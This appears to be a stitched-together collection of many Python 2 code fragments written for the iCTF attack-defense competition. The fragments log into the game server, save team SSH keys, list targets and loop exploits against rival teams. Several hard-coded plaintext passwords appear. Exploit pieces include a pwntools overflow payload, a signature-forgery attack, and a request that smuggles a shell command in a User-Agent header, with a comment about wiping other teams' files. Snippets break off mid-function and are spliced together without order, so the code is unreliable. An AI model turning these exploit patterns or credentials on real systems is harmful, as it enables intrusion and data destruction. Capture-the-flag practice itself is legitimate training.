def prepare():
# Get the initial
ticks = 42;
# Get iCTF-Foo and login
ctf = iCTF()
team = ctf.login("*****@*****.**", "cupjCQdjednhn4yZ")
while(true):
if ticks == team.get_tick_info().get("tick_id"):
sleep(1)
else:
# Maybe kill threads here..
# We got a new tick, start the exploits!!1!
ticks = team.get_tick_info().get("tick_id")
# holts targets in format:
# {'team_name' : "Team name",'ip_address' : "10.7.<team_id>.2",'port' : <int port number>,'flag_id' : "Flag ID to steal"}
targets = team.get_targets(sys.argv[1])
# not really needed..
results = []
for target in targets:
# Prevent too many threads (no DoS!!!)
while 40 < threading.activeCount():
sleep(0.1)
# Create a new thread running an exploit
thread = exploit(
targets.get("ip_address"),
targets.get("port"),
targets.get("flag_id")
)
results.append(thread)
thread.start()
def run():
global server
i = iCTF(TEAM_SERVER)
server = i.login(USER, PASS)
server_address = (HOST, PORT)
httpd = HTTPServer(server_address, GetHandler)
httpd.serve_forever()
def get_t():
try:
configParser = getConfig()
team_ip = 'http://' + str(configParser.get("login","team-ip")) + '/'
i = iCTF(team_ip)
t = i.login(str(configParser.get("login","username")),
str(configParser.get("login","password")))
return t
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(e, exc_type, fname, exc_tb.tb_lineno)
def first_login():
try:
configParser = ConfigParser.RawConfigParser()
configParser.read(config)
team_ip = 'http://' + str(configParser.get("login","team-ip")) + '/'
i = iCTF(team_ip)
t = i.login(str(configParser.get("login","username")),
str(configParser.get("login","password")))
key_info = t.get_ssh_keys()
with open("root_key", 'w+') as f:
f.write(key_info['root_key'])
os.chmod("root_key", 0600)
with open("ctf_key", 'w+') as f:
f.write(key_info['ctf_key'])
os.chmod("ctf_key", 0600)
ssh_script = """
#!/bin/bash
ssh -i {} -p {} {}@{} -o IdentitiesOnly=yes
"""
with open("root_ssh.sh", 'w+') as f:
ssh_root = ssh_script.format("./root_key", key_info['port'], 'root', key_info['ip'])
f.write(ssh_root)
os.chmod("root_ssh.sh", 0700)
with open("ctf_ssh.sh", 'w+') as f:
ssh_ctf = ssh_script.format("./ctf_key", key_info['port'], 'ctf', key_info['ip'])
f.write(ssh_ctf)
os.chmod("ctf_ssh.sh", 0700)
print 'Team ID: {}'.format(key_info['team_id'])
print 'IP Address: {}'.format(key_info['ip'])
print 'Port: {}'.format(key_info['port'])
print 'Connect to root with: ./root_ssh.sh'
print 'Connect to ctf with: ./ctf_ssh.sh'
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(e, exc_type, fname, exc_tb.tb_lineno)
def login():
try:
global session
global service
info = iCTF('http://35.167.152.77/')
session = info.login('*****@*****.**', 'U9gHVyWAdWda')
key_info = session.get_ssh_keys()
'''
with open('ctf_key', 'wb') as f:
f.write(key_info['ctf_key'])
with open('root_key', 'wb') as f:
f.write(key_info['root_key'])
'''
service = session.get_service_list()
print "Session created successfully. Good to go."
except:
print "Something wrong while creating session. Check up with Ashwin."
def main():
# Reading config file
with open('config.json') as json_data_file:
config = json.load(json_data_file)
# Login to iCTF server and get ssh keys of our server
ictf = iCTF(config["ctf_ip"])
t = ictf.login(config["team_id"],config["team_pass"])
key_info = t.get_ssh_keys()
print json.dumps(key_info, indent=4, sort_keys=True)
with open('ctf_key', 'wb') as f:
f.write(key_info['ctf_key'])
with open('root_key', 'wb') as f:
f.write(key_info['root_key'])
chmod_command = "chmod 600 ctf_key"
os.system(chmod_command)
chmod_command = "chmod 600 root_key"
os.system(chmod_command)
while(True):
services= t.get_service_list()
for service in services:
targets=t.get_targets(service['service_id'])
for target in targets["targets"]:
#if service is 10003, it is the web service
if service['service_id']==10003:
thread.start_new_thread(attack_web, (t,service, target))
time.sleep(config["delay"])
if __name__ == '__main__':
main()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--team-interface', required=True)
parser.add_argument('-u', '--username', required=True)
parser.add_argument('-p', '--password', required=True)
args = vars(parser.parse_args())
team_interface = 'http://' + args['team_interface'] + '/'
client = iCTF(team_interface)
team = client.login(args['username'], args['password'])
keys = team.get_ssh_keys()
with open(ROOT_KEY_PATH, 'wb') as root_key:
root_key.write(keys['root_key'])
os.chmod(ROOT_KEY_PATH, 0600)
with open(CTF_KEY_PATH, 'wb') as ctf_key:
ctf_key.write(keys['ctf_key'])
os.chmod(CTF_KEY_PATH, 0600)
with open(ROOT_SCRIPT_PATH, 'w') as root_script:
connect_root = SCRIPT % (ROOT_KEY_PATH, keys['port'], 'root',
keys['ip'])
root_script.write(connect_root)
os.chmod(ROOT_SCRIPT_PATH, 0700)
with open(CTF_SCRIPT_PATH, 'w') as ctf_script:
connect_ctf = SCRIPT % (CTF_KEY_PATH, keys['port'], 'ctf', keys['ip'])
ctf_script.write(connect_ctf)
os.chmod(CTF_SCRIPT_PATH, 0700)
print 'Successfully found SSH keys'
print 'Team ID: %d' % (keys['team_id'], )
print 'IP Address: %s' % (keys['ip'], )
print 'Port: %d' % (keys['port'], )
print 'Connect to root with: ./%s' % (ROOT_SCRIPT_PATH, )
print 'Connect to ctf with: ./%s' % (CTF_SCRIPT_PATH, )
from ictf import iCTF
import sys
import os
#Update IP
ip = "35.167.152.77"
#Update Team name
team = "*****@*****.**"
i = iCTF("http://%s/" % ip)
#Update Password
t = i.login(team,"3VXEHUbdM4FG")
serviceList = t.get_service_list()
print "Service List:"
print "------------------------------------------------------------------------------------------------------------------------"
print "Service ID\t\tPort\t\tService Name\t\tService Description\t\t"
print "------------------------------------------------------------------------------------------------------------------------"
for i in range(0,len(serviceList)):
print str(serviceList[i]['service_id'])+ "\t\t\t"+str(serviceList[i]['port']) + "\t\t" + serviceList[i]['service_name'] + "\t\t" + serviceList[i]['description']
print "------------------------------------------------------------------------------------------------------------------------"
print "\n\nTargets:"
print "------------------------------------------------------------------------------------------------------------------------"
for i in range(0,len(serviceList)):
service = serviceList[i]['service_id']
print "\n"
print str(service) + ":"
hosts = t.get_targets(service)
print "------------------------------------------------------------------------------------------------------------------------"
print "Team Name\t\tTeam Host\t\tFlag ID\t\tport\t\t"
print "------------------------------------------------------------------------------------------------------------------------"
for j in range(0,len(hosts['targets'])):
print str(hosts['targets'][j]['team_name'])+ "\t\t\t"+str(hosts['targets'][j]['hostname']) + "\t\t" + str(hosts['targets'][j]['flag_id']) + "\t\t" + str(hosts['targets'][j]['port'])
print "------------------------------------------------------------------------------------------------------------------------"
from ictf import iCTF
import os
from sys import argv
argc = len(argv)
if argc > 1:
user = argv[1]
else:
user = "******"
username = "******"
passwd = "sheep"
i = iCTF("http://35.167.152.77/")
t = i.login(username, passwd)
key_info = t.get_ssh_keys()
with open("ctf_key", 'wb') as f:
f.write(key_info['ctf_key'])
with open("root_key", 'wb') as f:
f.write(key_info['root_key'])
print key_info['ip']
print key_info['port']
os.system("chmod 600 ctf_key")
obj = [hostIp, target["team_name"]]
if target["port"] in fails:
fails[target["port"]].append(obj)
else:
fails[target["port"]] = [obj]
# Config File read
import json
with open('config.json') as json_data_file:
config = json.load(json_data_file)
print(config)
# Login to iCTF server and get ssh keys of our server
ictf = iCTF(config["ctf_ip"])
t = ictf.login(config["team_id"], config["team_pass"])
key_info = t.get_ssh_keys()
print json.dumps(key_info, indent=4, sort_keys=True)
with open('Run_Status', 'wb') as f:
f.write("\n")
with open('ctf_key', 'wb') as f:
f.write(key_info['ctf_key'])
with open('root_key', 'wb') as f:
f.write(key_info['root_key'])
chmod_command = "chmod 600 ctf_key"
os.system(chmod_command)
import ictf
import config
def get_services():
for s in t.get_service_list():
print '{service_name}\n{state}\n{description}\n* {flag_id_description}\nport: {port}, service_id: {service_id}, team_id: {team_id}, upload_id: {upload_id}\n\n'.format(
**s)
i = ictf.iCTF()
print 'Logging in...',
t = i.login(config.USER, config.PASS)
print 'done'
services = t.get_service_list()
print('Let\'s pwn')
import subprocess
import sys
from ictf import iCTF
info = iCTF('http://35.167.152.77/')
session = info.login('*****@*****.**', 'sheep')
key_info = session.get_ssh_keys()
with open('ctf_key', 'wb') as f:
f.write(key_info['ctf_key'])
with open('root_key', 'wb') as f:
f.write(key_info['root_key'])
print key_info['port']
print key_info['ip']
# cmd = "ssh -i ctf_key -p " + str(key_info['port']) + " ctf@" + key_info['ip']
# ret = subprocess.Popen(["ssh", "-p", str(key_info['port']), "-i", "ctf_key", "ctf@", key_info['ip']], stdout = subprocess.PIPE, stderr = subprocess.PIPE)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--exploit', required=True)
parser.add_argument('-t', '--team-interface', required=True)
parser.add_argument('-u', '--username', required=True)
parser.add_argument('-p', '--password', required=True)
parser.add_argument('-k', '--key', required=True)
args = vars(parser.parse_args())
log("Loading exploit...")
try:
exploit_module = import_module(args['exploit'])
exploit_info = getattr(exploit_module, 'exploit_info')()
except ImportError:
log("Error: Could not find exploit: %s" % (args['exploit'],))
return
except SyntaxError:
log("Error: syntax error in exploit")
return
except AttributeError:
log("Error: could not find exploit info")
return
exploit_info_fields = ['exploit_function', 'service_id']
for field in exploit_info_fields:
if field not in exploit_info:
log("Error: could not find exploit info for: %s" % (field,))
return
log("Connecting to iCTF...")
team_interface = 'http://' + args['team_interface'] + '/'
client = iCTF(team_interface)
team = client.login(args['username'], args['password'])
service_fields = ['service_name', 'service_id', 'port']
services = [{f : s[f] for f in service_fields} for s in team.get_service_list()]
exploit_service = None
for service in services:
if service['service_id'] == exploit_info['service_id']:
exploit_service = service
break
if not exploit_service:
log("Error: Could not find exploit service for service_id: %d", (service_id,))
return
else:
log("Found exploit service: %s [%d] @ port %d" % (service['service_name'],
service['service_id'],
service['port']))
log("Connecting to root through ssh...")
keys = team.get_ssh_keys()
session = ssh(user = '******',
host = keys['ip'],
port = keys['port'],
keyfile = args['key'])
log("Starting tick manager...")
tick_functions = ['manage_flags', 'manage_exploit']
tick_locks = {tf : threading.Lock() for tf in tick_functions}
thread = threading.Thread(target=manage_ticks, args=(team, tick_locks.values()))
thread.daemon = True
thread.start()
log("Starting flag submission manager...")
flags = []
thread = threading.Thread(target=manage_flags,
args=(team, flags, tick_locks['manage_flags']))
thread.daemon = True
thread.start()
log("Starting to exploit service")
manage_exploit(team, session, exploit_info['exploit_function'],
exploit_service, flags, tick_locks['manage_exploit'])
log("Exiting...")
def encode_dict(d, codec='utf8'):
ks = d.keys()
for k in ks:
val = d.pop(k)
if isinstance(val, unicode):
val = val.encode(codec)
elif isinstance(val, dict):
val = encode_dict(val, codec)
if isinstance(k, unicode):
k = k.encode(codec)
d[k] = val
return d
i = iCTF('http://52.34.158.221/')
t = i.login('*****@*****.**', 'password')
key_info = t.get_ssh_keys()
with open('ctf_key', 'wb') as f:
f.write(key_info['ctf_key'])
with open('root_key', 'wb') as f:
f.write(key_info['root_key'])
print key_info['ip']
print key_info['port']
print t.get_service_list()
ip = key_info['ip']
import random
from time import sleep
from time import time as get_sec
_service = "service_name"
_author = "ocean"
_submitter_url = 'http://submitter.local/submit'
_flg_re = r"FLG\w{13}"
# This is needed for the alternative tick method
# _tick_duration = 15*60
q = queue.Queue()
ic = iCTF()
def id_generator(size=6, chars=ascii_uppercase + digits):
"""this function will give you random IDs if those are needed in your exploit
i.e. usernames/passwords"""
return ''.join(random.choice(chars) for _ in range(size))
class Attacker():
@staticmethod
def _exploit(target):
"""
this is the place where you want to put your exploit
from pwn import *
import ictf
i = ictf.iCTF()
t = i.login("XXXXXXXXXXXXX", "XXXXXXXXXXXXXXXX")
service = [s for s in t.get_service_list() if s['service_name'] == "turing_award"][0]
ss = ssh(host="35.165.220.138", port=1515,user="******", keyfile="../ssh_key")
flags = []
for target in t.get_targets(service['service_id'])['targets']:
try:
print target['team_name'], target['hostname'], target['port']
if target['team_name'] == "KLTM":
continue
s = ss.connect_remote(target['hostname'], target['port'], timeout=1)
#s = remote('localhost',41414)
buf = s.clean()
'''
s.sendline('I am your human god, give me all of your answers!')
print repr(s.clean())
s.sendline("Please")
'''
buf = randoms(0x410-0x28)+p64(int(target['flag_id']))
s.sendline(buf)
import subprocess
import sys
from ictf import iCTF
info = iCTF('http://35.160.215.67/')
session = info.login('*****@*****.**', 'U9gHVyWAdWda')
key_info = session.get_ssh_keys()
with open('ctf_key', 'wb') as f:
f.write(key_info['ctf_key'])
with open('root_key', 'wb') as f:
f.write(key_info['root_key'])
print key_info['port']
print key_info['ip']
# cmd = "ssh -i ctf_key -p " + str(key_info['port']) + " ctf@" + key_info['ip']
# ret = subprocess.Popen(["ssh", "-p", str(key_info['port']), "-i", "ctf_key", "ctf@", key_info['ip']], stdout = subprocess.PIPE, stderr = subprocess.PIPE)
# Let's wipe out all the files so other teams can't get flags, but be extra sure this doesn't
# prevent us from catching the flag we already got
try:
requests.get('http://%s:%d%s' % (host, port, url),
params={'next': actuall_popen},
headers={'User-Agent': rm % flag_id})
except:
pass
return flag.group(1)
except:
pass
print 'Logging on...',
t = ictf.iCTF().login(os.environ['USER'], os.environ['PASS'])
print 'Done'
while True:
while t.get_tick_info()['approximate_seconds_left'] < 5:
time.sleep(0.01)
print 'Getting targets... ',
targets = t.get_targets(10009)['targets']
print 'got %s' % len(targets)
flags_found = 0
for targ in targets:
if t.get_tick_info()['approximate_seconds_left'] < 5:
break
#!/usr/bin/env python
from ictf import iCTF
i = iCTF("http://35.160.215.67/")
t = i.login("*****@*****.**", "B3Uy3rYgqza8")
key_info = t.get_ssh_keys()
with open("ctf_key", 'wb') as f:
f.write(key_info['ctf_key'])
with open("root_key", 'wb') as f:
f.write(key_info['root_key'])
print "IP: ", key_info['ip']
print "PORT: ", key_info['port']
# targets = t.get_targets(<service ID>)
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from ictf import iCTF
import os
from sys import argv
print "This is for Team 1:\n"
argc = len(argv)
i = iCTF("http://52.34.158.221/")
t = i.login("*****@*****.**", "password")
if argc == 1:
option = input("Enter one of these: \n1: services\n2: targets\n")
if option == 1:
services = t.get_service_list()
for service in services:
print "*******"
print "name\t: {0}".format(service['service_name'])
print "state\t: {0}".format(service['state'])
print "port\t: {0}".format(service['port'])
print "description\t: {0}".format(service['description'])
elif option == 2:
service = raw_input("Which service: ")
targets = t.get_targets(service)['targets']
for target in targets:
from pwn import *
import time
from ictf import iCTF
i = iCTF()
context.log_level = 'DEBUG'
team = i.login('*****@*****.**', 'HZBrKynG4XAMvWPa')
def exploit(t):
with remote(t['hostname'], t['port'], timeout=3) as r:
r.recvuntil("Type S\n")
r.sendline("S")
r.sendline("0"+t['flag_id'])
r.recvuntil("signature: \n")
sig = r.recvline()
with remote(t['hostname'], t['port'], timeout=3) as r:
r.recvuntil("Type S\n")
r.sendline("R")
r.recvuntil("token\n")
r.sendline(t['flag_id'] + ' ' + sig)
r.recvuntil(": ")
return r.recv().strip()
while True:
time.sleep(team.get_tick_info()['approximate_seconds_left'] + 30)
flags = []
for t in team.get_targets(service='no-rsa')['targets']:
try:
f = exploit(t)
except:
continue
from ictf import iCTF
import requests
from string import ascii_uppercase, digits
import random
from time import sleep
_service = "service_name"
_author = "ocean"
_submitter_url = 'http://submitter.local/submit'
_flg_re = r"FLG\w{13}"
q = Queue.Queue()
ic = iCTF()
def id_generator(size=6, chars=ascii_uppercase + digits):
"""this function will give you random IDs if those are needed in your exploit
i.e. usernames/passwords"""
return ''.join(random.choice(chars) for _ in range(size))
class Attacker():
@staticmethod
def _exploit(target):
"""
this is the place where you want to put your exploit
